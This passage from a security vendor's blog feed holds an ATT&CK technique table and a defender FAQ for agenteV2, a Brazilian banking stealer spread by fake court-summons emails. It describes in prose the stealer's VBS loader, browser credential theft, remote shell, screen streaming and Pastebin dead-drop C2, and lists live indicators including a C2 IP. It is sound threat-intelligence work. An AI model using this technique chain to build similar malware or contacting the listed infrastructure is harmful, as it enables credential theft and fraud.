                                        			Tactic                    </th>
                                                <th class="wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="D1"
                    data-col-index="3"
                    data-row-index="0"
                    style=" width:7.6923076923077%;                    padding:10px;
                    "
                    >
                                        			Sub-technique                    </th>
                                                <th class="wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="E1"
                    data-col-index="4"
                    data-row-index="0"
                    style=" width:47.330316742081%;                    padding:10px;
                    "
                    >
                                        			Evidence                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			T1566.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Phishing:			Spearphishing Attachment                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Initial			Access                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D2"
                    data-col-index="3"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E2"
                    data-col-index="4"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Judicial			lure .eml password-protected PDF + VBS download link                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			T1204.002                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			User			Execution: Malicious File                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Execution                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D3"
                    data-col-index="3"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			.002                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E3"
                    data-col-index="4"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Victim			manually runs 0124_INTMACAO_.vbs                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			T1059.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Command			& Scripting: VBScript                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Execution                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D4"
                    data-col-index="3"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E4"
                    data-col-index="4"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			WScript.exe			executes VBS loader                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			T1140                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Deobfuscate/Decode			Files                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Defense			Evasion                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D5"
                    data-col-index="3"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E5"
                    data-col-index="4"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			VBS			Base64 obfuscation 8.4x size expansion on decode                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			T1027                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			Obfuscated			Files or Information                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			Defense			Evasion                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E6"
                    data-col-index="4"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			agenteV2			DLL compiled to native code via Nuitka; mypyc aux layer                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			T1036.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Masquerading:			Match Legit Name                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Defense			Evasion                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E7"
                    data-col-index="4"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			wifi_driver.exe			+ msedge03/04.exe in C:\Program Files (x86)\Wi-fi\                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			T1105                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Ingress			Tool Transfer                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			C2                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E8"
                    data-col-index="4"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			VBS			downloads container EXEs via MSXML2.ServerXMLHTTP + ADODB.Stream                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			T1053.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			Scheduled			Task/Job                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			Persistence			/ Priv. Esc.                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D9"
                    data-col-index="3"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			.005                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E9"
                    data-col-index="4"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			RunAsAdmin_AutoUpdate			+ RunAsAdmin_Executar /sc onlogon /rl highest                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			T1547.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			Registry			Run Keys                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			Persistence                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D10"
                    data-col-index="3"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E10"
                    data-col-index="4"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			HKCU\Run\MonitorSystem			→ agenteV2_historico_detect.py                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			T1548.002                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			Abuse			Elevation: Bypass UAC                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C11"
                    data-col-index="2"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			Privilege			Escalation                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D11"
                    data-col-index="3"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			.002                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E11"
                    data-col-index="4"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			VBS			re-executes with /elevated /fromtask                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			T1555.003                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			Credentials			from Browser                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C12"
                    data-col-index="2"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			Credential			Access                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D12"
                    data-col-index="3"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			.003                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E12"
                    data-col-index="4"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			SQLite			DB cloning of Chrome/Edge Login Data + Cookies all browser			profiles                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A13"
                    data-col-index="0"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        			T1113                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B13"
                    data-col-index="1"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        			Screen			Capture                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C13"
                    data-col-index="2"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        			Collection                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D13"
                    data-col-index="3"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E13"
                    data-col-index="4"
                    data-row-index="12"
                    style="                    padding:10px;
                    "
                    >
                                        			PIL			+ mss libraries continuous JPEG frame streaming over WebSocket to			operator                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A14"
                    data-col-index="0"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        			T1059.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B14"
                    data-col-index="1"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        			Command			& Scripting: PowerShell/Shell                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C14"
                    data-col-index="2"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        			Execution                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D14"
                    data-col-index="3"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E14"
                    data-col-index="4"
                    data-row-index="13"
                    style="                    padding:10px;
                    "
                    >
                                        			Remote			shell via CMD:SHELL: prefix parsed from WebSocket dispatched			through subprocess.Popen                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A15"
                    data-col-index="0"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        			T1571                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B15"
                    data-col-index="1"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        			Non-Standard			Port                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C15"
                    data-col-index="2"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        			C2                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D15"
                    data-col-index="3"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E15"
                    data-col-index="4"
                    data-row-index="14"
                    style="                    padding:10px;
                    "
                    >
                                        			WebSocket			C2 (uws://) over port 8443 non-standard port for WebSocket traffic                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A16"
                    data-col-index="0"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        			T1012                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B16"
                    data-col-index="1"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        			Query			Registry                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C16"
                    data-col-index="2"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D16"
                    data-col-index="3"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E16"
                    data-col-index="4"
                    data-row-index="15"
                    style="                    padding:10px;
                    "
                    >
                                        			84,457			registry reads observed in sandbox                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A17"
                    data-col-index="0"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        			T1082                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B17"
                    data-col-index="1"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        			System			Information Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C17"
                    data-col-index="2"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D17"
                    data-col-index="3"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E17"
                    data-col-index="4"
                    data-row-index="16"
                    style="                    padding:10px;
                    "
                    >
                                        			psutil			+ WMI: hostname, UUID, OS version, process list                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A18"
                    data-col-index="0"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        			T1083                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B18"
                    data-col-index="1"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        			File			and Directory Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C18"
                    data-col-index="2"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D18"
                    data-col-index="3"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E18"
                    data-col-index="4"
                    data-row-index="17"
                    style="                    padding:10px;
                    "
                    >
                                        			Scans			all browser profiles across all user directories                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A19"
                    data-col-index="0"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        			T1057                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B19"
                    data-col-index="1"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        			Process			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C19"
                    data-col-index="2"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D19"
                    data-col-index="3"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        			—                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E19"
                    data-col-index="4"
                    data-row-index="18"
                    style="                    padding:10px;
                    "
                    >
                                        			psutil			enumerates running processes terminates browsers before DB file			access                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A20"
                    data-col-index="0"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        			T1518.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B20"
                    data-col-index="1"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        			Security			Software Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C20"
                    data-col-index="2"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        			Discovery                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D20"
                    data-col-index="3"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E20"
                    data-col-index="4"
                    data-row-index="19"
                    style="                    padding:10px;
                    "
                    >
                                        			Queries			disk paths for Diebold Warsaw and GbPlugin anti-fraud solutions                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row even" >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012 wpdt-bc-EFC2C2"
                                            data-cell-id="A21"
                    data-col-index="0"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        			T1102.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B21"
                    data-col-index="1"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        			Web			Service: Dead Drop Resolver                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C21"
                    data-col-index="2"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        			C2                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D21"
                    data-col-index="3"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E21"
                    data-col-index="4"
                    data-row-index="20"
                    style="                    padding:10px;
                    "
                    >
                                        			pastebin.com/raw/0RmxqY57			resolves to real C2 IP:port                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row odd" >
                                <td class="wpdt-cell wpdt-bc-EDC1C1 wpdt-fs-000012"
                                            data-cell-id="A22"
                    data-col-index="0"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        			T1071.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B22"
                    data-col-index="1"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        			App			Layer Protocol: WebSocket                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C22"
                    data-col-index="2"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        			C2                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D22"
                    data-col-index="3"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        			.001                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="E22"
                    data-col-index="4"
                    data-row-index="21"
                    style="                    padding:10px;
                    "
                    >
                                        			Persistent			uws:// WebSocket connection to 38.242.246.176:8443 bidirectional			real-time C2                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-311'>
table#wpdtSimpleTable-311{ table-layout: fixed !important; }
table#wpdtSimpleTable-311 td, table.wpdtSimpleTable311 th { white-space: normal !important; }
.wpdt-bc-E91E63 { background-color: #E91E63 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
.wpdt-bc-EFC2C2 { background-color: #EFC2C2 !important;}
.wpdt-bc-EDC1C1 { background-color: #EDC1C1 !important;}
</style>




<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1777028022700"><strong class="schema-faq-question"><strong>Who is targeted by this campaign?</strong></strong> <p class="schema-faq-answer">This campaign targets Brazilian individuals and organizations — anyone who might receive what appears to be an official court summons. The lure is broad (civil conciliation hearing, not targeted spearphishing), meaning any employee in Brazil could be a victim. </p> </div> <div class="schema-faq-section" id="faq-question-1777028100417"><strong class="schema-faq-question"><strong>My organization doesn&#8217;t do banking in Brazil. Should we still care?</strong></strong> <p class="schema-faq-answer">Yes. The stealer harvests all browser-saved credentials — not just banking ones — across all Chromium-based browser profiles. Corporate credentials stored in browser password managers (email, SaaS platforms, VPNs, internal portals) are all at risk. Additionally, the malware installs a full remote shell, meaning a successful infection grants the attacker persistent, elevated access to the corporate endpoint regardless of banking activity.</p> </div> <div class="schema-faq-section" id="faq-question-1777028296008"><strong class="schema-faq-question"><strong>How quickly can an attacker conduct financial fraud after initial infection?</strong></strong> <p class="schema-faq-answer">Very quickly. The malware begins beaconing to C2 within approximately 30 seconds of the VBS file being executed. Once the operator&#8217;s WebSocket session is established, they can view the victim&#8217;s screen in real time. If a banking session is already open in the browser, fraud could occur within minutes. The operator is not automated — they are watching and waiting, which means they will time their intervention to maximize impact (e.g., during an active funds transfer).</p> </div> <div class="schema-faq-section" id="faq-question-1777028519139"><strong class="schema-faq-question">We blocked the C2 IP (38.242.246.176). Are we protected?</strong> <p class="schema-faq-answer">Partially. Blocking the known C2 IP prevents beaconing to the current infrastructure, but the Pastebin dead-drop resolver means the attacker can rotate to a new IP simply by editing a public Pastebin page — without touching any already-deployed malware. Blocking the specific Pastebin URL (pastebin.com/raw/0RmxqY57) and monitoring for TLS connections to port 8443 from non-browser processes provides more durable protection. The JA3 fingerprint (a48c0d5f95b1ef98f560f324fd275da1) is particularly valuable as it will detect agenteV2&#8217;s TLS handshake regardless of IP rotation.</p> </div> <div class="schema-faq-section" id="faq-question-1777028533483"><strong class="schema-faq-question">How can ANY.RUN help us detect, investigate, and respond to this threat?</strong> <p class="schema-faq-answer">ANY.RUN&#8217;s Interactive Sandbox was used to conduct the full dynamic analysis in this report — providing complete visibility into the infection chain, process trees, API traces, network connections, and registry modifications. For ongoing defense: TI Lookup lets analysts query all IOCs from this report for correlated intelligence; TI Feeds push live indicators into your SIEM/SOAR/EDR for automated blocking; and the YARA rule in section 9.3 can be deployed to automatically detect new agenteV2 variants. The Enterprise suite combines all these capabilities in a unified platform designed for security teams that need to investigate and respond at scale.</p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/brazilian-banking-phishing-campaign/">Inside agenteV2: How Brazilian Attackers Use Fake Court Summons to Steal Banking Credentials in Real Time </a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/brazilian-banking-phishing-campaign/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>More Attack Context for Faster Triage, Response, and Hunting. Now Available to Every SOC</title>
		<link>https://any.run/cybersecurity-blog/expanded-free-ti-plan/</link>
					<comments>https://any.run/cybersecurity-blog/expanded-free-ti-plan/#respond</comments>
		
		<dc:creator><![CDATA[ANY.RUN]]></dc:creator>
		<pubDate>Wed, 22 Apr 2026 13:14:24 +0000</pubDate>
				<category><![CDATA[Service Updates]]></category>
		<category><![CDATA[AI]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[malware behavior]]></category>
		<category><![CDATA[threat intelligence]]></category>
		<category><![CDATA[yara search]]></category>
